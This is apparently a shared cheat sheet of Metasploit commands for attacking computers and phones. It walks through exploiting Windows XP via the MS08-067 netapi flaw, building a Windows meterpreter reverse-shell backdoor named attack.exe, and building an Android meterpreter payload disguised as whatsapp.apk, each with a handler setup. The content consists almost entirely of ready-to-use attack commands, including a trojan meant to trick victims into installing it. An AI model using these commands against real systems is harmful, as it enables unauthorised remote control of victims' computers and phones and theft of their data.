Download as pptx, pdf, or txt
Download as pptx, pdf, or txt
You are on page 1of 3

Exploit Windows XP with Netapi

Vulnerability
msf > use windows/smb/ms08_067_netapi
msf > set RHOST 192.168.1.50
msf > set LHOST 192.168.1.51

Creating a backdoor for Windows 7


Msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.11
LPORT=4321 x>/root/attack.exe
--------------------------------------------------------------------------------------------- Use exploit/multi/handler
Set lhost 192.168.1.11
Set lport 4321
Set payload windows/meterpreter/reverse_tcp
exploit

Exploiting Android Phone


msfpayload android/meterpreter/reverse_tcp LHOST=192.168.1.9
LPORT=443 R > whatsapp.apk
-------------------------------------------------------------------------------------------use exploit/multi/handler
set payload android/meterpreter/reverse_tcp
set lhost 192.168.8.94
set lport 443
exploit

You might also like